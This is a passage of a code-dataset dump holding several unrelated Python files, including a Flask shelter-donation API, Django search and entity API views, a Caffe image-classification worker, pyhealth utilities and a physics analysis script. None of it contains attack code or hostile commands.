яблоко\n# 2. банан\n# 3. киви\n# 4. арбуз\n\n# Hint: use the .format() method\n\nprint(\"Task 1\")\nfruit_list=[\"яблоко\", \"банан\", \"киви\", \"арбуз\"]\n\nfor x in range(0, len(fruit_list)):\n print('%d.'%(x+1), '{:>6}'.format(fruit_list[x].strip()))\n\n\n\n\n\n\n\n# Task 2:\n# Given two arbitrary lists.\n# Remove from the first list the elements that are present in the second list and print the result.\nprint(\"\\nTask 2\")\nlist1=[i**2 for i in range(10)]\nlist2=[i**2 for i in range(0,20,2)]\n\nprint('List 1:',list1)\nprint('List 2:',list2)\ni=0\nwhile i 0:\n damage.Damage(source, target, 'fire attack', fire_attack_cards, 'fire',\n 1).operate(game_control)\n","sub_path":"ext/src/sleevecards/fire_attack.py","file_name":"fire_attack.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"642209247","text":"# -*- coding: utf-8 -*-\n\n# Author: Zhi Qiao \n\n# License: BSD 2 clause\n\nimport os\nimport numpy as np\n\ndef check_expdata_dir(expdata_id):\n \"\"\"\n Check whether the exp data folder exist,\n If not, will create the folder\n\n Parameters\n\n ----------\n root_dir : str,\n root dir of current project\n\n expdata_id : str, optional (default='init.test') \n name of current experiment data\n\n \"\"\"\n\n r_root = os.path.join('./', 'experiments_data')\n if os.path.exists(r_root) is False:\n os.mkdir(r_root)\n exp_root = os.path.join(r_root, expdata_id)\n if os.path.exists(exp_root) is False:\n os.mkdir(exp_root)\n\ndef check_model_dir(expmodel_id):\n \"\"\"\n Check whether the checkouts/results folders of current experiment(exp_id) exist,\n If not, will create both folders\n\n Parameters\n\n ----------\n root_dir : str,\n root dir of current project\n\n expmodel_id : str, optional (default='init.test') \n name of current experiment\n\n \"\"\"\n\n r_root = os.path.join('./', 'experiments_records')\n if os.path.exists(r_root) is False:\n os.mkdir(r_root)\n exp_root = os.path.join(r_root, expmodel_id)\n if os.path.exists(exp_root) is False:\n os.mkdir(exp_root)\n checkout_dir = os.path.join(exp_root, 'checkouts')\n result_dir = os.path.join(exp_root, 'results')\n if os.path.exists(checkout_dir) is False:\n os.mkdir(checkout_dir)\n if os.path.exists(result_dir) is False:\n os.mkdir(result_dir)\n\ndef label_check(y, hat_y = None, assign_task_type = None):\n \n def check_task_type(y, hat_y = None):\n if hat_y is not None:\n try:\n hat_y = np.array(hat_y).astype(float)\n y = np.array(y).astype(float)\n except:\n raise Exception('unsupported data type for hat_y, y')\n _shape_hat_y, _shape_y = np.shape(hat_y), np.shape(y)\n if _shape_hat_y != _shape_y:\n raise Exception('the data shapes of y and hat_y do not match')\n\n label_n_check = set([])\n label_item_set = set([])\n label_row_set = set([])\n for each_y_path in y:\n label_n_check.add(len(np.array(each_y_path)))\n label_item_set.update(np.array(each_y_path).astype(int).tolist())\n label_row_set.add(sum(np.array(each_y_path).astype(int)))\n\n if len(label_n_check) != 1:\n raise Exception('label_n is inconsistent in data')\n\n if len(label_item_set) <= 1:\n raise Exception('value space size <=1 is invalid')\n elif len(label_item_set) == 2:\n if 0 in label_item_set and 1 in label_item_set:\n if list(label_n_check)[0] == 1:\n task_type = 'binaryclass'\n else:\n if max(label_row_set) == 1:\n task_type = 'multiclass'\n else:\n task_type = 'multilabel'\n else:\n raise Exception('odd values exist in label value 
space')\n else:\n if list(label_n_check)[0] == 1:\n task_type = 'regression'\n else:\n raise Exception('odd values exist in label value space')\n return task_type\n\n pre_task_type = check_task_type(y, hat_y)\n if assign_task_type is not None:\n if assign_task_type in ['binaryclass', 'multilabel', 'multiclass', 'regression']:\n if assign_task_type == pre_task_type:\n task_type = pre_task_type\n else:\n raise Exception('current data does not support the given task-type {0}; task-type {1} is suggested'\\\n .format(assign_task_type, pre_task_type)) \n else:\n raise Exception('fill in a correct task-type [\\'binaryclass\\', \\'multilabel\\', \\'multiclass\\', \\'regression\\'], \\\n or do not fill in any value')\n else:\n task_type = pre_task_type\n \n return task_type","sub_path":"pyhealth/utils/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"452053586","text":"#app.config['MONGO_DBNAME'] = ''\n#app.config['MONGO_URI'] = ''\n\n#mongo = PyMongo(app)\n\n#serve up index.html\n\nfrom flask import Flask, jsonify, request, render_template\nfrom flask_pymongo import PyMongo\nfrom bson import ObjectId\n\napp = Flask(__name__)\n\napp.config['MONGO_DBNAME'] = 'hackrice17'\napp.config['MONGO_URI'] = 'mongodb://user:pass@ds149134.mlab.com:49134/hackrice17'\n\nmongo = PyMongo(app)\n\n###### DATA MODEL\n# User\n# {\n# _id : user id,\n# email: user email,\n# name: user's name,\n# pwd: password,\n# sid: shelter id\n# }\n#\n# Product\n# {\n# _id: product id (auto-populated),\n# name: product name,\n# amz_link: amazon link,\n# cost: cost of product\n# }\n#\n# Shelter\n# {\n# _id: shelter id (auto-populated),\n# name: shelter name,\n# lat: latitude,\n# lon: longitude,\n# address: address,\n# products: [\n# { pid (product id): count },\n# ...\n# ]\n# }\n\n# donator side\n# GET: /shelters\n# output:\n# {\n# 'result':\n# [\n# { sid: shelter id, name: shelter name, latitude: latitude,\n# longitude: longitude, address: shelter address, products:\n# products in shelter },\n# ...\n# ]\n# }\n@app.route('/shelters', methods=['GET'])\ndef get_all_shelters():\n shelters = mongo.db.shelters\n output = []\n for s in shelters.find():\n output.append({'sid': str(s['_id']), 'name': s['name'], 'latitude': s['lat'],\n 'longitude': s['lon'], 'address': s['address'], 'products': s['products']})\n return jsonify({'result': output})\n\n# GET: /<pid>/product_specs\n# output:\n# {\n# 'result':\n# {\n# pid: product id,\n# name: product name,\n# cost: product cost,\n# amz_link: product's amazon link\n# } \n# 'INVALID UID' \n# }\n@app.route('/<pid>/product_specs')\ndef get_product_specs(pid):\n product = mongo.db.products.find_one({'_id': pid})\n if product:\n output = {'pid': product['pid'], 'name': product['name'],\n 'cost': product['cost'], 'amz_link': product['amz_link']}\n else:\n output = 'INVALID UID'\n return jsonify({'result': output})\n\n# people in shelter side\n\n# POST: /signup\n# input:\n# {\n# uid: user id,\n# email: user email,\n# name: user name,\n# pwd: user password,\n# shelter_name: shelter name\n# }\n# output:\n# {\n# result: 'SIGN UP FAILED' \n# 'SIGN UP SUCCESS' \n# }\n@app.route('/signup', methods=['POST'])\ndef sign_up():\n users = mongo.db.users\n # fields\n _id = request.json['uid']\n email = request.json['email']\n # if the user id already exists\n if users.find_one({'_id': _id}) or users.find_one({'email': email}):\n return jsonify({'result': 'SIGN UP FAILED'})\n name = request.json['name']\n pwd = 
request.json['pwd']\n sid = mongo.db.shelters.find_one({'name': request.json['shelter_name']})\n users.insert({'_id': _id, 'email': email, 'name': name, 'pwd': pwd, 'sid': sid})\n return jsonify({'result': 'SIGN UP SUCCESS'})\n\n# GET: /<uid>/userinfo\n# output:\n# {\n# 'result':\n# {\n# uid: user id,\n# sid: shelter id\n# } \n# 'INVALID UID' \n# }\n@app.route('/<uid>/userinfo')\ndef get_user_shelter(uid):\n user = mongo.db.users.find_one({'_id': uid})\n if user:\n output = {'uid': uid, 'sid': user['sid']}\n else:\n output = 'INVALID UID'\n return jsonify({'result': output})\n\n\n# GET: /products\n# output:\n# {\n# 'result':\n# [\n# { pid: product id, name: product name },\n# ...\n# ]\n# }\n@app.route('/products', methods=['GET'])\ndef get_all_products():\n products = mongo.db.products\n output = []\n for p in products.find():\n output.append({'pid': str(p['_id']), 'name': p['name']})\n return jsonify({'result': output})\n\n@app.route('/product', methods=['POST'])\ndef add_product():\n shelters = mongo.db.shelters\n products = mongo.db.products\n sid = request.json['sid']\n pid = request.json['pid']\n count = request.json['count']\n shelter = shelters.find_one({'_id': ObjectId(sid)})\n if not shelter:\n return jsonify({'result': 'FAILED'})\n prod = None\n for p in shelter['products']:\n if p['pid'] == pid:\n prod = p\n break\n if prod:\n prod['count'] = prod['count'] + count\n else:\n prod = dict()\n prod['pid'] = pid\n prod['count'] = count\n shelter['products'].append(prod)\n shelters.save(shelter)\n return jsonify({'result': 'SUCCESS'})\n\n@app.route('/')\ndef home():\n #if 'username' in session:\n #return 'You are logged in as' + session['username']\n return render_template('index.html')\n\n@app.route('/main_app.html')\ndef login():\n return ''\n\n\n@app.route('/registration.html')\ndef register():\n return ''\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"FlaskApp/Shelper/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"158858587","text":"import numpy as np\nfrom scipy.stats import sem\nfrom uncertainties import ufloat\nimport uncertainties.unumpy as unp\nfrom uncertainties.unumpy import (nominal_values as noms, std_devs as stds)\n\nthetanull = 10 # degree\nwellenlaenge = 633 * 10**(-9) # meter\nglasdicke = 10**(-3) # meter\nmesswerte = np.genfromtxt('data/m3.csv', unpack=True)\n\nwerte = ufloat(np.mean(messwerte), sem(messwerte))\nprint('Maxima/Minima', werte)\nn0 = f'{noms(werte):.1f}'\ns0 = f'{stds(werte):.1f}'\ns0 = s0[-1]\nprint('n0, s0')\nprint(n0, s0)\nwith open('build/p-m3-werte.tex', 'w') as file:\n file.write(r'\\overline{M} &= \\num{')\n file.write(f'{n0}({s0})')\n file.write(r'}')\n\nphase = werte * 2 * np.pi\nprint('Phasenverschiebung', phase)\nn0 = f'{noms(phase):.0f}'\ns0 = f'{stds(phase):.0f}'\nprint('n0, s0')\nprint(n0, s0)\nwith open('build/p-m3-phase.tex', 'w') as file:\n file.write(r'\\overline{\\Del{Φ}} &= \\SI{')\n file.write(f'{n0}({s0})')\n file.write(r'}{\\degree}')\n\n\ndef BrechIndex(theta, maxmin, lambd, dicke, thetanull):\n return 1 / (1 - (lambd * maxmin) / (2 * dicke * theta * thetanull))\n\n\nbrechindex = BrechIndex(np.deg2rad(thetanull), werte, wellenlaenge, glasdicke, np.deg2rad(10))\nprint('Φ = 10° | Brechungsindex', brechindex)\nn0 = f'{noms(brechindex):.3f}'\ns0 = f'{stds(brechindex):.3f}'\ns0 = s0[-1]\nprint('n0, s0')\nprint(n0, s0)\nwith open('build/p-m3-n10.tex', 'w') as file:\n 
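# The .tex snippets written here use the siunitx \\num{n0(s0)} notation: n0 is the\n # rounded nominal value and s0 was reduced to its final digit above (s0 = s0[-1]),\n # i.e. the uncertainty in the last decimal place.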
file.write(r'n_{\\SI{10}{\\degree}} &= \\num{')\n file.write(f'{n0}({s0})')\n file.write(r'}')\n\nbrechindex = BrechIndex(np.deg2rad(thetanull - 1), werte, wellenlaenge, glasdicke, np.deg2rad(10))\nprint('Φ = 9° | Brechungsindex', brechindex)\nn0 = f'{noms(brechindex):.2f}'\ns0 = f'{stds(brechindex):.2f}'\ns0 = s0[-1]\nprint('n0, s0')\nprint(n0, s0)\nwith open('build/p-m3-n9.tex', 'w') as file:\n file.write(r'n_{\\SI{9}{\\degree}} &= \\num{')\n file.write(f'{n0}({s0})')\n file.write(r'}')\n","sub_path":"v64-m-moderne-interferometrie/python-skripts/m3.py","file_name":"m3.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"192042685","text":"import os\nimport time\nimport numpy as np\nimport caffe\nimport gear\nimport cStringIO as StringIO\nimport json\nimport urllib2\nfrom caffe.io import resize_image\nimport logging\n# logging.basicConfig(level=logging.DEBUG)\n\ncaffe.set_mode_cpu()\nMAX_PREDICT_LENGTH = 5\n\nRAW_SCALE = 255.\n\ndef load_binaryproto(fn):\n blob = caffe.proto.caffe_pb2.BlobProto()\n data = open(fn, 'rb').read()\n blob.ParseFromString(data)\n arr = np.array( caffe.io.blobproto_to_array(blob) )\n return arr[0]\n\n\nclass Classifier(object):\n def __init__(self, resoursesPath):\n mean_file = resoursesPath + \"/mean.binaryproto\"\n model_def_file = resoursesPath + \"/deploy.prototxt\"\n pretrained_model_file = resoursesPath + \"/models/huabot-brain.caffemodel\"\n\n mean=load_binaryproto(mean_file)\n\n self.net = caffe.Classifier(\n model_def_file, pretrained_model_file,\n image_dims=(256, 256),\n raw_scale=RAW_SCALE,\n channel_swap=(2, 1, 0)\n )\n\n in_shape = self.net.transformer.inputs[self.net.inputs[0]]\n if mean.shape[1:] != in_shape[2:]:\n mean = caffe.io.resize_image(mean.transpose((1,2,0)), in_shape[2:]).transpose((2,0,1))\n\n self.net.transformer.set_mean(self.net.inputs[0], mean)\n\n def classify_image(self, image):\n try:\n starttime = time.time()\n scores = self.net.predict([image], oversample=True).flatten()\n endtime = time.time()\n\n indices = (-scores).argsort()[:MAX_PREDICT_LENGTH]\n meta = [{'id':i, 'score': float(scores[i])} for i in indices]\n return (True, meta, endtime - starttime)\n\n except Exception as err:\n logging.exception(err)\n return (False, 'Something went wrong when classifying the '\n 'image. 
Maybe try another one?')\n\nclass Brain(object):\n def __init__(self, resoursesPath):\n self._clf = Classifier(resoursesPath)\n self._funcs = {}\n self._worker = gear.Worker('huaban-brain')\n\n def _add_func(self, func_name, callback):\n self._worker.registerFunction(func_name)\n self._funcs[func_name] = callback\n\n def add_server(self, host='localhost', port=4730):\n self._worker.addServer(host, port)\n\n def process(self):\n self._add_func('CAFFE:PREDICT', self.classify_image)\n self._add_func('CAFFE:PREDICT:URL', self.classify_image_url)\n while 1:\n job = self._worker.getJob()\n func = self._funcs.get(job.name)\n if func:\n try:\n func(job)\n except Exception as e:\n job.sendWorkComplete(json.dumps({'err': str(e)}))\n print('process %s error: %s'%(job.name, e))\n\n def classify_image(self, job):\n self._classify_image(job, job.arguments)\n\n def classify_image_url(self, job):\n url = job.arguments\n\n rsp = urllib2.urlopen(url, timeout=10)\n data = rsp.read()\n self._classify_image(job, data)\n\n def _classify_image(self, job, data):\n image = caffe.io.load_image(StringIO.StringIO(data))\n result = self._clf.classify_image(image)\n if result[0]:\n result = {'bet_result': result[1], 'time': result[2]}\n else:\n result = {'err': result[1]}\n print(result)\n job.sendWorkComplete(json.dumps(result))\n\n\ndef main(scripts, resoursesPath='resourses'):\n GEARMAND_PORT = os.environ.get('GEARMAND_PORT',\n 'tcp://127.0.0.1:4730')[6:].split(':')\n\n brain = Brain(resoursesPath)\n brain.add_server(GEARMAND_PORT[0], int(GEARMAND_PORT[1]))\n\n print(\"brain process\")\n brain.process()\n\nif __name__ == \"__main__\":\n import sys\n main(*sys.argv)\n","sub_path":"tools/predict_worker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"303129051","text":"from django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n\nfrom .services.search_service import SearchService\nfrom .views.base import has_group\nfrom .forms.childminder_forms.form import SearchForm\nfrom .models import ApplicantName, ApplicantPersonalDetails, Application\n\n\n@login_required()\ndef search(request):\n \"\"\"\n This is the contact centre search applications page\n :param request: An Http request- you must be logged in.\n :return: The search template on GET request, or submit it and return the search results on POST\n \"\"\"\n\n SEARCH_TEMPLATE_PATH = 'search.html'\n\n cc_user = has_group(request.user, settings.CONTACT_CENTRE)\n arc_user = has_group(request.user, settings.ARC_GROUP)\n context = {\n 'cc_user': cc_user,\n 'arc_user': arc_user,\n 'empty': True\n }\n\n if (cc_user or arc_user) and request.user.is_authenticated:\n\n if request.method == 'GET':\n context['form'] = SearchForm()\n return render(request, SEARCH_TEMPLATE_PATH, context)\n\n elif request.method == 'POST':\n form = SearchForm(request.POST)\n context['form'] = form\n\n if form.is_valid():\n name = form.cleaned_data['name_search_field']\n dob = form.cleaned_data['dob_search_field']\n home_postcode = form.cleaned_data['home_postcode_search_field']\n care_location_postcode = form.cleaned_data['care_location_postcode_search_field']\n reference = form.cleaned_data['reference_search_field']\n\n if settings.ENABLE_NANNIES:\n application_type = form.cleaned_data['application_type_dropdown_search_field']\n else:\n application_type = 
'Childminder'\n\n # If no search terms have been entered\n if not any([name, dob, home_postcode, care_location_postcode, reference]) \\\n and not (application_type or not settings.ENABLE_NANNIES):\n context['empty_error'] = True\n context['error_title'] = 'There was a problem with your search'\n context['error_text'] = 'Please use at least one filter'\n return render(request, SEARCH_TEMPLATE_PATH, context)\n\n search_results = SearchService.search(name, dob, home_postcode, care_location_postcode, reference,\n application_type)\n\n if search_results is not None and len(search_results) > 0:\n context['empty'] = False\n context['app'] = search_results\n\n else:\n context['empty_error'] = True\n context['error_title'] = 'No results found'\n context['error_text'] = 'Check that you have the correct details and spelling.'\n\n return render(request, SEARCH_TEMPLATE_PATH, context)\n else:\n return HttpResponseRedirect(settings.URL_PREFIX + '/login/')\n\n\ndef format_data(results):\n \"\"\"\n This adds the missing data from the objects returned from the search\n :param results: QuerySet of objects that match the query.\n :return: a QuerySet of results that match the search\n \"\"\"\n arr = list(results)\n for i in arr:\n # these if statements are not obvious; essentially we need to get name, date submitted, updated and application id for each result found\n if hasattr(i, 'application_id'):\n if hasattr(i, 'personal_detail_id'):\n # DoB was searched for (has both personal_details_id and application_id columns)\n app = Application.objects.get(application_id=i.application_id.pk)\n name = ApplicantName.objects.get(personal_detail_id=i.personal_detail_id.pk)\n i.name = name.first_name + \" \" + name.last_name\n else:\n # This means an application id was searched for (has only application_id, and not personal_detail_id)\n app = Application.objects.get(application_id=i.application_id)\n\n if ApplicantName.objects.filter(application_id=app.pk).exists():\n name = ApplicantName.objects.get(application_id=app.pk)\n i.name = name.first_name + \" \" + name.last_name\n\n if hasattr(i, 'first_name'):\n # This if statement is for if they searched a name\n det = ApplicantPersonalDetails.objects.get(personal_detail_id=i.personal_detail_id.pk)\n i.application_id = det.application_id\n app = Application.objects.get(application_id=i.application_id.pk)\n i.name = i.first_name + \" \" + i.last_name\n\n if app.date_submitted is not None:\n i.submitted = app.date_submitted.strftime('%d/%m/%Y')\n else:\n i.submitted = None\n if app.date_updated is not None:\n i.accessed = app.date_updated.strftime('%d/%m/%Y')\n else:\n i.accessed = None\n\n i.type = 'Childminder'\n if app.application_status == 'DRAFTING':\n i.sub_type = 'Draft'\n elif app.application_status == 'ACCEPTED':\n i.sub_type = 'Pending checks'\n elif app.application_status == 'FURTHER_INFORMATION':\n i.sub_type = 'Returned'\n elif app.application_status == 'SUBMITTED':\n i.sub_type = 'New'\n elif app.application_status == 'ARC_REVIEW':\n i.sub_type = 'Assigned'\n else:\n i.sub_type = ''\n\n if hasattr(i, 'application_reference'):\n app_id = i.application_id\n else:\n app_id = i.application_id.pk\n i.link = '/arc/search-summary?id=' + str(app_id)\n i.audit_link = '/arc/auditlog?id=' + str(app_id)\n return results\n","sub_path":"arc_application/contact_centre.py","file_name":"contact_centre.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"650964325","text":"import re\n\nfrom 
dcapi.aggregates.handlers import execute_top\nfrom dcentity.models import Entity, EntityAttribute, BioguideInfo\nfrom piston.handler import BaseHandler\nfrom piston.utils import rc\nfrom urllib import unquote_plus\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom uuid import UUID\n\n\nget_totals_stmt = \"\"\"\n select cycle,\n coalesce(contributor_count, 0)::integer,\n coalesce(recipient_count, 0)::integer,\n coalesce(contributor_amount, 0)::float,\n coalesce(recipient_amount, 0)::float,\n coalesce(l.count, 0)::integer,\n coalesce(firm_income, 0)::float,\n coalesce(non_firm_spending, 0)::float,\n coalesce(grant_count, 0)::integer,\n coalesce(contract_count, 0)::integer,\n coalesce(loan_count, 0)::integer,\n coalesce(grant_amount, 0)::float,\n coalesce(contract_amount, 0)::float,\n coalesce(loan_amount, 0)::float,\n coalesce(e.count, 0)::integer,\n coalesce(e.amount, 0)::float,\n coalesce(cm.count, 0)::integer,\n coalesce(epa.count, 0)::integer,\n coalesce(r.docket_count, 0)::integer,\n coalesce(r.document_count, 0)::integer,\n coalesce(rs.docket_count, 0)::integer,\n coalesce(rs.document_count, 0)::integer,\n coalesce(f.member_count, 0)::integer,\n coalesce(f.committee_count, 0)::integer,\n coalesce(indexp.spending_amount, 0)::float,\n coalesce(fec_committee.total_raised, 0)::float,\n coalesce(fec_committee.count, 0)::integer\n from\n (select *\n from agg_entities\n where entity_id = %s) c\n full outer join\n (select *\n from agg_lobbying_totals\n where entity_id = %s) l\n using (cycle)\n full outer join\n (select *\n from agg_spending_totals\n where recipient_entity = %s) s\n using (cycle)\n full outer join\n (select *\n from agg_earmark_totals\n where entity_id = %s) e\n using (cycle)\n full outer join (\n select cycle, count\n from agg_pogo_totals\n where entity_id = %s) cm \n using (cycle)\n full outer join (\n select cycle, count\n from agg_epa_echo_totals\n where entity_id = %s) epa\n using (cycle)\n full outer join (\n select cycle, docket_count, document_count\n from agg_regulations_text_totals\n where entity_id = %s) r\n using (cycle)\n full outer join (\n select cycle, docket_count, document_count\n from agg_regulations_submitter_totals\n where entity_id = %s) rs\n using (cycle)\n full outer join (\n select cycle, member_count, committee_count\n from agg_faca_totals\n where org_id = %s) f\n using (cycle)\n full outer join (\n select cycle, spending_amount\n from agg_fec_indexp_totals\n where entity_id = %s) indexp\n using (cycle)\n full outer join (\n select cycle, total_raised, count\n from agg_fec_committee_summaries\n where entity_id = %s) fec_committee\n using (cycle)\n\"\"\"\n\ndef get_totals(entity_id):\n totals = dict()\n for row in execute_top(get_totals_stmt, *[entity_id] * 11):\n totals[row[0]] = dict(zip(EntityHandler.totals_fields, row[1:]))\n return totals\n\n\nclass EntityHandler(BaseHandler):\n allowed_methods = ('GET',)\n\n totals_fields = ['contributor_count', 'recipient_count', 'contributor_amount', 'recipient_amount', \n 'lobbying_count', 'firm_income', 'non_firm_spending', \n 'grant_count', 'contract_count', 'loan_count', 'grant_amount', 'contract_amount', 'loan_amount', \n 'earmark_count', 'earmark_amount', \n 'contractor_misconduct_count',\n 'epa_actions_count',\n 'regs_docket_count', 'regs_document_count', 'regs_submitted_docket_count', 'regs_submitted_document_count',\n 'faca_member_count', 'faca_committee_count',\n 'independent_expenditure_amount', 'fec_total_raised', 'fec_summary_count']\n ext_id_fields = ['namespace', 'id']\n\n def read(self, 
request, entity_id):\n\n try:\n entity_id = UUID(entity_id)\n entity = Entity.objects.select_related().get(id=entity_id)\n except ObjectDoesNotExist:\n return rc.NOT_FOUND\n except ValueError:\n return rc.NOT_FOUND\n\n totals = get_totals(entity_id)\n\n external_ids = [{'namespace': attr.namespace, 'id': attr.value} for attr in entity.attributes.all()]\n\n result = {'name': entity.name,\n 'id': entity.id,\n 'type': entity.type,\n 'totals': totals,\n 'external_ids': external_ids,\n 'metadata': entity.metadata}\n\n return result\n\n\nclass EntityAttributeHandler(BaseHandler):\n allowed_methods = ('GET',)\n fields = ['id']\n\n def read(self, request):\n namespace = request.GET.get('namespace', None)\n bioguide_id = request.GET.get('bioguide_id', None)\n id = request.GET.get('id', None)\n\n if (not id or not namespace) and not bioguide_id:\n error_response = rc.BAD_REQUEST\n error_response.write(\"Must include a 'namespace' and an 'id' parameter or a 'bioguide_id' parameter.\")\n return error_response\n\n if bioguide_id:\n entities = BioguideInfo.objects.filter(bioguide_id = bioguide_id)\n else:\n entities = EntityAttribute.objects.filter(namespace = namespace, value = id)\n\n return [{'id': e.entity_id} for e in entities]\n\n\nclass EntitySearchHandler(BaseHandler):\n allowed_methods = ('GET',)\n\n fields = [\n 'id', 'name', 'type',\n 'count_given', 'count_received', 'count_lobbied',\n 'total_given','total_received', 'firm_income', 'non_firm_spending',\n 'state', 'party', 'seat', 'lobbying_firm', 'is_superpac'\n ]\n\n stmt = \"\"\"\n select\n e.id, e.name, e.type,\n coalesce(a.contributor_count, 0)::integer,\n coalesce(a.recipient_count, 0)::integer,\n coalesce(l.count, 0)::integer,\n coalesce(a.contributor_amount, 0)::float,\n coalesce(a.recipient_amount, 0)::float,\n coalesce(l.firm_income, 0)::float,\n coalesce(l.non_firm_spending, 0)::float,\n pm.state, pm.party, pm.seat, om.lobbying_firm, om.is_superpac\n from matchbox_entity e\n inner join (select distinct entity_id\n from matchbox_entityalias ea\n where to_tsvector('datacommons', ea.alias) @@ to_tsquery('datacommons', quote_literal(%s))) ft_match\n on e.id = ft_match.entity_id\n left join politician_metadata_latest_cycle_view pm\n on e.id = pm.entity_id\n left join organization_metadata_latest_cycle_view om\n on e.id = om.entity_id\n left join agg_lobbying_totals l\n on e.id = l.entity_id and l.cycle = -1\n left join agg_entities a\n on e.id = a.entity_id and a.cycle = -1\n \"\"\"\n\n def read(self, request):\n query = request.GET.get('search', None)\n if not query:\n error_response = rc.BAD_REQUEST\n error_response.write(\"Must include a query in the 'search' parameter.\")\n return error_response\n\n parsed_query = ' & '.join(re.split(r'[ &|!():*]+', unquote_plus(query)))\n raw_result = execute_top(self.stmt, parsed_query)\n\n return [dict(zip(self.fields, row)) for row in raw_result]\n\n\nclass EntitySimpleHandler(BaseHandler):\n allowed_methods = ('GET',)\n\n fields = ['id', 'name', 'type', 'aliases']\n\n stmt = \"\"\"\n select e.id, name, type, case when count(alias) = 0 then ARRAY[]::varchar[] else array_agg(alias) end as aliases\n from matchbox_entity e\n left join matchbox_entityalias a on\n e.id = a.entity_id and e.name != a.alias\n %s -- possible where clause for entity type\n group by e.id, name, type\n order by e.id\n offset %%s\n limit %%s\n \"\"\"\n\n count_stmt = \"\"\"\n select count(*)\n from matchbox_entity\n %s -- possible where clause for entity type\n \"\"\"\n\n def read(self, request):\n count = 
request.GET.get('count', None)\n start = request.GET.get('start', None)\n end = request.GET.get('end', None)\n entity_type = request.GET.get('type', None)\n \n if entity_type:\n where_clause = \"where type = %s\"\n else:\n where_clause = ''\n\n if count:\n return dict(count=execute_top(self.count_stmt % where_clause, *([entity_type] if entity_type else []))[0][0])\n \n if start is not None and end is not None:\n try:\n start = int(start)\n end = int(end)\n except:\n error_response = rc.BAD_REQUEST\n error_response.write(\"Must provide integers for start and end.\")\n return error_response\n else:\n error_response = rc.BAD_REQUEST\n error_response.write(\"Must specify valid start and end parameters.\")\n return error_response\n\n if (end < start or end - start > 10000):\n error_response = rc.BAD_REQUEST\n error_response.write(\"Only 10,000 entities can be retrieved at a time.\")\n return error_response\n \n raw_result = execute_top(self.stmt % where_clause, *([entity_type] if entity_type else []) + [start, end - start + 1])\n return [dict(zip(self.fields, row)) for row in raw_result]\n\n","sub_path":"dcapi/aggregates/entities/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":9894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"109658091","text":"import os\nimport sys\n\nimport pyqtgraph as pg\n\nfrom nose import with_setup\n\n_lib_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'lib'))\nsys.path.insert(0, _lib_path)\nimport libpyuewr\n\n\ndef get_input(file_name):\n \"\"\"Get path to the input image file for testing.\"\"\"\n data_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'tests', 'data')\n return os.path.join(data_dir, 'input', file_name)\n\ndef get_baseline(file_name):\n \"\"\"Get path to the baseline image file for testing.\"\"\"\n data_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'tests', 'data')\n return os.path.join(data_dir, 'baseline', file_name)\n\n\ndef test_Image2DView():\n app = pg.Qt.QtGui.QApplication([])\n file_path = get_input('mri3D_0.mha')\n viewer = libpyuewr.create_viewer([file_path])\n","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"166315128","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 2 11:25:10 2019\n\n@author: safin\n\n\"\"\"\nprint(\"Please be patient, depending on your spec, this may take a 20-30 min wait; afterwards you'll be presented with two different graphs, one for Figure 4, and the other for Figure 5\")\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random as rand\n\n\ndef plot_3rd_diagram(x,y):\n \n plt.figure(figsize=(10,10))\n plt.plot(x,y)\n plt.plot(x,y,'bo')\n \n plt.xlabel(r\"$\\lambda$\", fontsize=18)\n plt.ylabel('RMSE Error', fontsize=16)\n plt.title(\"Figure 5\")\n plt.show()\n \ndef plot_4rd_diagram(somelist,y):\n \n plt.figure(figsize=(10,10))\n new_lamda_vec=[lamda_vec[0],lamda_vec[2],lamda_vec[-2],lamda_vec[-1]]\n new_some_list=[somelist[0],somelist[2],somelist[-2],somelist[-1]]\n for i in new_some_list:\n x=new_lamda_vec[new_some_list.index(i)]\n x=str(x)\n\n plt.plot(y,i,label=r\"$\\lambda = $\"+x)\n \n plt.xlabel(r\"$\\alpha$\", fontsize=18)\n plt.ylabel('RMSE Error', fontsize=16)\n plt.title(\"Figure 4\")\n plt.legend()\n plt.show()\n \n\ndef generate_a_dataset():\n statehistory_vector =[3]\n 
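# Bounded random walk in the style of Sutton's TD(lambda) experiments: states 0..6,\n # every episode starts in the centre state 3 and terminates at 0 (left) or 6 (right);\n # 100 training sets of 10 sequences each are generated below.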
